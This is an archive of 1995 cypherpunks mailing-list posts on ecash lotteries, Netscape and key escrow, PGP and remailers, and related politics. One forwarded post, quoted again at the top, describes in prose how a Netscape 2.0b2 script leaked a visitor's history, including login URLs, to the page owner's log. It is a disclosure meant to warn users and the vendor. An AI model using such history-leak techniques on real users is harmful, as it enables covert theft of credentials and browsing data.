| >to get to my page, it then generates a string of these and forces the
| >Netscape client to load a URL that is a CGI script with the QUERY_STRING
| >set to the users History.  The CGI script then adds this information
| >to a log file.  Now if this hasn't quite CLICKED yet lets do a little
| >example.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From jamesd at echeque.com  Thu Nov 30 22:41:57 1995
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 1 Dec 1995 14:41:57 +0800
Subject: ecash lottery (Was: ecash casino)
Message-ID: <199512010624.WAA16728@blob.best.net>


At 11:53 PM 11/30/95 +0100, Laurent Demailly wrote:
>'small' questions about inet gambling
>
> + How do you complain that you didn't got your win without revealing
> your ID ?
>
> + Alternatively, How do you prevent false complains or nasty
> concurrent trying to trash gambling co reputation ?

Gambler submits a value that contains a hash of his guess, plus
random noise, plus some random numbers resembling random noise
that if signed by the bank will become anonymous ecash (once
deblinded).

Lottery has to acknowledge payments by signing the hashed
guess,

After the drawing, if the lottery cheats, the winner can prove that 
the lottery cheated by anonymously revealing the values that when
hashed yield the number signed by the lottery.  If a disgruntled 
person makes such an allegation, then in order to prove they
did not cheat the lottery must anonymously reveal the numbers
signed by the bank.  If the reveal this, this proves they are 
fine, and also pays the gambler, because he holds the deblinding
factor which will turn those bank signed numbers into money.

Thus not only can it be carried out anonymously, but disputes
can be fought anonymously.



>
>regards
>ps: it would be easier that the game is legal so ppl can play without
>being hidden... In my current casino, most people do complain when
>there is a problem, and I think that those who don't aren't because
>its monopoly money or just they aren't paying much attention...
>
>dl
>--
>Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
>Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
>
>jihad Ortega Qaddafi Legion of Doom South Africa KGB Uzi
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From nobody at REPLAY.COM  Thu Nov 30 22:42:09 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 1995 14:42:09 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199512010620.HAA28237@utopia.hacktic.nl>


-----BEGIN PGP SIGNED MESSAGE-----

sameer wrote:

>http://www.cnet.com/Central/News/govt.html
>
>        Bad. Very Bad. And I was almost starting to like 
>        Netscape.

Yes, bad. Yes, almost. Like a psychotic, Netscape has been teasing people with annoyingly buggy "betas," seeming to be well-intentioned, innocently clumsy, forgivable for its enthusiasm. Now the mask drops and we see the feral beast.

tcmay wrote:

> Jim Clark is actively working for the enemies of liberty and 
> freedom.

As usual, Tim states it concisely, even elegantly.

> I wonder what discussions Jim Clark has been having with the 
> Feds?

I can assure those who doubt this that Jim did not wake up one morning saying, "Gee, this security thing is just so-o-o-o big a nut to crack that we need to bump it upstairs to the Big Boys. Yeah! That's it! Uncle Sam will make the Internet safe for commerce! Boy, this is going to be a great day! Hey, Mom! Can I have a slice of your great apple pie for breakfast?  B-r-r-r!  It's brisk this morning! Mom, Where did you put my flag?"

With Netscape's sudden and surprising rise to prominence, its executives have no doubt been getting a crash course on what it's like to live in the world of people who take power and money VERY seriously. They've no doubt been disabused of childish notions and shown the glint of steely knives in the recesses of three-piece suits. No doubt more than one stomach plummeted to the sub-basement as they learned that Wonderland is populated by dark and deadly predators who don't just meekly make room for a new player.

Jim may not even be important enough to have been the one visited, but we can be sure someone was visited and explained some of the rules by which the full-contact professional game is played. What we are witnessing here is the loss of innocence, noticeable only because the time scale is so compressed by Netscape's explosive rise.

It's not even so much their caving that disgusts -- it's the hypocrisy. It's the lack of balls to say, "Guess what?  We got a most unusual visit by so-and-so who spoke unofficially for so-and-so, who wants us to know that we'll be toast if we push this issue of strong crypto."

It's as if someone you know suddenly takes up living with the creepy-crawlies in dark, damp places under rocks. One day you lift a rock and discover them there with some surprise, but instead of emerging or explaining, they say, "I like it here! This is the proper way to live!" and pull the rock back into place. It's not natural.

rjc wrote:

> What's the point? Surely Clark must realize that even if 
> Netscape adds key escrow to SSL/Secure Courier, it is still 
> possible to tunnel

and

> The genie is out of the bottle.

The Feds' approach to this kind of thing will be to make circumvention of escrow punishable by, say, a $10 million fine and 30 years in prison, with a teensy little provision that it doesn't matter how it comes to their attention.  That way, you not only run the risk that they find out by virtue of you having become a target of authorized eavesdropping, you run the risk that a, um, mistaken or, er, collateral eavesdrop reveals that your communications are circumventing escrow.

People in Montana and Nevada probably once thought the highway speed genie was out of the bottle, but all it took was fuel-shortage hype to enact a law effectively instituting a "national" speed limit, even though federal control of travel on roads outside federal reservations is wholly without constitutional authority.  

Most people have some contact with issues of cars, gasoline, speed, and fuel economy, yet there was barely a whimper. How likely is it that more than a few percent of the population will even grasp what is being done to them with key escrow and the PR flim-flam that will be used to spackle over the real issues?

jsw wrote:

> Please don't give up on us yet.

I have.  I'll reconsider when Jim reveals who inoculated him with GAK juice and when Netscape own up to how they caved and publicly disavow the position he advanced.

> All press accounts I've read so far have lots of stuff 
> attributed to Jim, but very little of it is actual quotes. 
> There appears to be lots of paraphrasing and interpretation 
> being done on the part of the reporters.  The impression that 
> I'm getting is that the press has blown a couple of small sound 
> bites way out of proportion.

Not to be overly dramatic, but this sounds like a non-policy German expatriate might have sounded in the late 1930's, trying to quell alarm over reports of atrocities filtering out of the Reich. It may be well-intentioned, but it's out of the loop.

> The infoworld article that covers the same speech only 
> devotes about 20% of the article to the key escrow topic, 
> and is similarly devoid of actual quotes.

This is the "turd in the punchbowl" principle, Jeff. Suppose your 
Presidential candidate sounded fine in 95% of his coverage, and only in 5% is he reported to advocate raising human children on farms for organ harvest? How big a turd does there have to be in the punchbowl before you will consider the punch unfit to drink? "Well, hell! There's only the ONE, and it's not even as big as the ice cubes!"  Right.

> I have not spoken to Jim about this, 

Uh-huh...

> and I did not hear the talk myself, 

Uh-huh...

> so I'm mostly reading between the lines here.  

Uh-huh.

> After I saw the story earlier today I started asking around 
> to see if the company had made any major policy shift in the 
> direction of GAK, and wasn't able to turn up anything.

So we're supposed to operate on the same blind faith you display. Right.

> My feelings about key escrow, which were echo'd by several 
> folks in management when I spoke to them today are...

Jeff, what you're revealing is a bit of confusion with respect to who runs the company. With all due respect, and taking your statements at face value without reading subterfuge into them, I believe you're in the dark, and positioned to get a hard lesson in real world corporate politics. Do you like your job? Do you have a mortgage? If this doesn't go down the way you think it's going, will YOU tell all?

> I don't want to go down in history as a facilitator of the 
> totalitarian state, and I don't think anyone else here does either.

Dark periods of history are full of well-intentioned people who, in the crunch, opted to save their own skins and facilitated whatever they were told to facilitate.

> ...and I hope everyone will judge us by what we do.

You can be sure of that. Meanwhile, if you really have principles, start taking names. Names, dates, places, things. If you're right, you can throw it all away later. If we're right, you'll have an opportunity to shed light on the process sometime down the road.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML6LT0jw99YhtpnhAQF7IgIAhHkHuYNJ0ncTEw27ZLU4FUSYQoxNJdyy
Ki08cJka/nAyD/D4iQyYB5Y3Jmppb5okFr+UxvdYmS+RZYFnNLfy8A==
=mCuE
-----END PGP SIGNATURE-----












From graeme at chem2.chem.swin.edu.au  Thu Nov 30 22:46:37 1995
From: graeme at chem2.chem.swin.edu.au (Graeme Cross)
Date: Fri, 1 Dec 1995 14:46:37 +0800
Subject: Netscape 2.0b2 allows for invasion of privacy (fwd)
Message-ID: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>



Talking of Netscape - this posting prompted me to forward it given the 
security and privacy implications inherent in the problem.

Cheers
Graeme

------- Start of forwarded message -------
>From: Scott Weston <scott at tripleg.com.au>
>Subject: Netscape 2.0b2 allows for invasion of privacy
>Newsgroups: aus.net.announce,comp.privacy
>Date: Fri, 01 Dec 1995 11:09:06 +1100

Hi 'Net Dwellers,

First off - I've posted this before (however not to this group) and only
got a response from the Netscape Corp.  They were glad I found the
problem and said that they would fix it, however I feel that people
should know about it.  Also I would like people to help me spread this
document around, i.e. if you know of a newsgroup (or people) that would
find this interesting then please re-postit.

On with the problem...

I've recently got hold of the latest netscape, and was (at first) very
excited about the new "LiveScripts" that it supports.  If people don't
yet know - these "LiveScripts" allow you to put small programs into your
web page that is then executed by the Netscape client.  There is no
DIRECT way for these programs to send information back to the owner of
the web page, however I was able to do it in a not-so-direct way.

The "LiveScript" that I wrote extracts ALL the history of the current
netscape window.  By history I mean ALL the pages that you have visited
to get to my page, it then generates a string of these and forces the
Netscape client to load a URL that is a CGI script with the QUERY_STRING
set to the users History.  The CGI script then adds this information
to a log file.  Now if this hasn't quite CLICKED yet lets do a little
example.

Johnny Mnemonic starts up his newly acquired version of Netscape2.0b2
to start his daily "surf" session.  First he decides to check his CD-NOW
purchase and uses the handy Auto-Login URL.  Then he decides to go to
Lycos and do a search.  In his search he find my page, which he decides
to visit.  Suddenly he is transported, not to my main page but to one
of my CGI scripts, which in turn happens to have ALL the URL's he just
been to in it.  This means that in my log will be:

  - the URL to use to get into CD-NOW as Johnny Mnemonic, including
    username and password.
  - The exact search params he used on Lycos (i.e. exactly what he
    searched for)
  - plus any other places he happened to visit.

I do this in a way that the user will KNOW that it has happened and
will _hopefully_ email Netscape and tell them they are NOT impressed.
But it would be EASY for me to change the CGI script so that the user
is unaware that it has actually happened, unless they closely examine
their URL history (in fact they'll probably just think its a netscape
bug).


If you're skeptical about this then do the test yourself.  Get netscape
2.0b2 and do some normal surfing, and then go to Lycos.  Do a search for:

  scotts car boot sale

which should return the URL - http://www.tripleg.com.au/staff/scott

Click on the URL and sit back an watch.  First my main page will show up
but a little while later you should be transported to a CGI bin script
that will show you your URL history.

I have tested this with both the Linux 2.0b2, and Solaris 2.0b2 versions
and both have done the same thing.  I would be interested in knowing if
it happens for ALL versions of Netscape2.0b2.  The log file does log
the User Agent (i.e. the name of the platform you are using) so by simply
going to the page I will know that your version of Netscape is also
open to this form of attack.

Currently I can find no way to configure Netscape2.0b2 to NOT run
LiveScripts - and at the very least this option should be quickly
added to the next version of netscape to be released.  But a far
better solution (IMHO) would be for netscape to pop up a window before
running the LiveScript and let you know what the LiveScript wants access
to, e.g. if it only wants to print out the current time then that's
OK, but if it wants to read my history list and then transport me to
a CGI script and add me to a logfile then maybe I would say NO.

I think I've said enough....

If you've got any further questions, or want some more information just
email me : scott at tripleg.com.au

-- 
Scott.

Quote from a car accident insurance claim: "I told the police that I was
not injured, but on removing my hat, I found that I had a skull fracture."
------- End of forwarded message -------






From EALLENSMITH at ocelot.Rutgers.EDU  Thu Nov 30 23:27:54 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Fri, 1 Dec 1995 15:27:54 +0800
Subject: Medical Records
Message-ID: <01HY9R839B8G8WYZVM@mbcl.rutgers.edu>


From:	IN%"adam at homeport.org"  "Adam Shostack" 29-NOV-1995 14:05:58.31

	It seems that they use signatures & hashes; nice work, a good
advance for medical records storage, but I'd ask how keys are managed,
and also what prevents me exploiting the 'hash-only' mode of sending
in what I'm cliaming to be is an emergency.  (Not that these
invalidate the system; they're just interesting areas to work on.)
----------------------
	Good questions. I would encourage anyone in San Fransisco to go by
and talk to them (or, of course, if anyone can find the researcher's email
address, that would be excellent).
	-Allen





From attila at primenet.com  Thu Nov 30 23:29:18 1995
From: attila at primenet.com (attila)
Date: Fri, 1 Dec 1995 15:29:18 +0800
Subject: WTO an even worse possibility as Inet regulator
In-Reply-To: <199512010519.VAA12922@blob.best.net>
Message-ID: <Pine.BSD.3.91.951201061914.17960C-100000@usr4.primenet.com>


On Wed, 29 Nov 1995, James A. Donald wrote:

> At 08:40 PM 11/30/95 +0000, attila wrote:
> >	<attila sez>  but WTO is also accumulating a rather larger 
> >    bureaucracy and is challeng Uncle Sam on severl major unilateral
> >    actions.  [...] and it will be by the WTOs and world courts, or the
> >    Rockefeller NWO --read UN, and UN troops in America. 
> 
> This is excessively paranoid:  The main threat to freedom is still
> internal, rather than external.
>
    	<attila sez #2> I do not think it is particularly paranoid. the 
    trend is set. As the UN accumulates power it gains larger support from
    the third world who significantly out-vote, in terms of US standards
    of one man, one vote traditions. 

	 I also think it is going to be difficult for the permanent 
    members of the security counsel to justify their singular veto power 
    (except China, of course). The UN, as it is currently chartered
    effectively leaves the power in the hands of the security counsel; the
    general assembly generally is a forum for anti-American,
    anti-European, etc. rhetoric. 

	if the UN sets the court with open membership and no vetos, the 
    US is boxed into either defying the court with all the intendant
    public relations problems or surrendering its ecomnomic interests. 

        what it boils down to, a decison must be made between compelling 
    economic interests and one man, one vote; the latter choking the US 
    rather quickly.
 
> The major expansion of WTO power came because of the notorious
> corruption and one sidedness of American courts judging disputes
> between foreign and American businessmen.
>
       <attila sez #2>  got any real samples where forreign courts are 
    impartial to domestic interest v. US interests?
 
> Since WTO courts do not have WTO gunmen this amounts to a major
> separation of judicial and executive power, thus though it is
> a centralizing move, it is also a move that favors liberty an
> the rule of law.
>
        <attila sez #2> I think you're to idealistic as to the results 
    based on ideology!  or, maybe I am too cynical...  :)
 
> Of course the first stages in centralization always do, at first,
> favor liberty and the rule of law as they restrain corrupt and
> lawless local powers.  Later, much later, the centralized power
> becomes a greater threat to liberty than those local authorities
> that it restrained.  
>
	<attila sez #2>  here we agree 100%
 
> That stage is still a long way down the track, and very likely 
> the modern nation state will collapse first.
> 
        <attila sez #2> history is compressing the time frame as 
    new "history" is made.  As for the nation-state collapsing first, no, 
    I think it will be a case of the nation-state being helped along by
    the NWO or whatever globalization of power.

        I would certainly rather believe it is a long way off, but the US 
    is no longer solvent. It has gone from the largest creditor country in
    the world to the largest debtor (v. all the rest of the world
    combined) in a space of less than 50 years.  This is nothing more than
    a self serving bureaucracy promising all things to all people and
    blowing it on basic high school level economics --it is the equivalent
    of kiting checks or credit cards, for which we would go to jail. 






From daw at CS.Berkeley.EDU  Thu Nov 30 23:31:15 1995
From: daw at CS.Berkeley.EDU (David A Wagner)
Date: Fri, 1 Dec 1995 15:31:15 +0800
Subject: digital receipts and cash
Message-ID: <199512010408.UAA04333@quito.CS.Berkeley.EDU>


Digital cash protocols are starting to look like they could become very
popular and useful.

But under current proposals, there's one thing you don't get when you
spend digital cash: a digital receipt.

(Later, if the vendor reneges on the transaction, you'd have the digital
receipt to prove that you paid & the vendor is cheating you.)

This seems like it would be a really useful feature.  Does anyone know
if there are any *practical* protocols to do this?

ObCypherpunks relevance: digital receipts seem (IMHO) important to the
emergence of fair and robust reputation markets.  Discuss.

ObCrypto relevance: I've looked through _Applied Cryptography_, but the
protocols listed there aren't practical -- they require something like
100 rounds of interaction!  Can this be improved?





From ahupp at primenet.com  Thu Nov 30 23:32:58 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Fri, 1 Dec 1995 15:32:58 +0800
Subject: key for Alice as promised (not)
Message-ID: <199512010334.UAA07818@usr2.primenet.com>


>On Tue, 28 Nov 1995, Adam Hupp wrote:
>
>> >Can you imagine??  I'm simply not willing to fool myself into thinking 
>> >that I ahve security by posting a key and using PGP.
>> 
>> Unless you can post some proof that PGP is insecure, stop insisting it is.
>
>Hold on a minute.  Alice is, here, 100% correct.
>
>If I use PGP to read messages and there's a videocamera trained on the 
>keyboard, and other people have access to the machine, PGP is not 
>secure.  Similarly, if PGP is on a computer which other people may use 
>without my supervision, they can  monitor keystrokes, etc. and PGP is not 
>secure.
>
>A chain is only as strong as its weakest link; Alice recognizes this, and 
>makes no claim that PGP itself is the weak link.  The weak link is the 
>physical security of the system which Alice claims to use.
>
>Jon
>------------------------------------------------------------------------------
>Jon Lasser                <jlasser at rwd.goucher.edu>            (410)494-3072 
>          Visit my home page at http://www.goucher.edu/~jlasser/
>  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
>
>

I guess I missed Alice's point, but I gave it more thought and Alice is
still wrong:

1) If someone DID monitor Alice, that almost defanitly means the remailer
chain was compromised. The weakest link here is the remailer chain, not
Alice's computer's physical security.*  If Alice's true address is not
known, there cannot be any monitoring of his/her computer (unless it for
some other reason than "Alice").

2) This whole deal is about Alice signing his/her messages, not encrypting
them.  What Alice would be giving up if his/her computer were compromised
would not be security, but identity. The most Alice could lose, IF the
remailer chain were compromised and IF his/her computer's physical security
were compromised is his/her's reputation by spoofing (loss of
pseudo-anonaminity is a given if the attacker gets that far).  Those are
some really big Ifs.

*BTW, the chain is NOT as strong as it's weakest link.  If I send mail to a
remailer, and it strips the headers like it's supposed to, but sends the
mail to a compromised remailer (the weak link), I am just as secure as before. 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----






From ecarp at netcom.com  Thu Nov 30 23:43:46 1995
From: ecarp at netcom.com (Ed Carp)
Date: Fri, 1 Dec 1995 15:43:46 +0800
Subject: Getting a copy of the Jim Clark speech
Message-ID: <199512010744.BAA18327@khijol>


> Date:          Thu, 30 Nov 1995 21:43:57 -0600 (CST)
> From:          Frank Stuart <fstuart at vetmed.auburn.edu>
> To:            loki at obscura.com, cypherpunks at toad.com
> Subject:       Re: Getting a copy of the Jim Clark speech

> >If he has not clarified his position by tomorrow evening, I will set up some
> >web pages explaining the situation and decrying Netscape's apparent
> >position on key escrow (GAK). I have the quotes that L. McCarthy posted,
> >and Jeff Weinstein's response. I have not been able to get the article off
> >the server yet (possible all the cypherpunks downloading it?). Any other
> >documents I should include?
> 
> I'm working on an "obnoxify" program to convert normal html documents into
> documents that look normal to non-netscape browsers, but are too painful to
> read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  I think tomorrow evening
> would be a good time to decide whether or not to distribute it.

The only problem with this approach is that this will bite other 
browsers that have started supporting the so-called "Netscape 
extensions".  More than one person has coded the Netscape stuff into 
their pages because it gives the author more flexibility than the 
standard 1.0/2.0 standards.  And there aren't many browsers out there 
yet that support 3.0.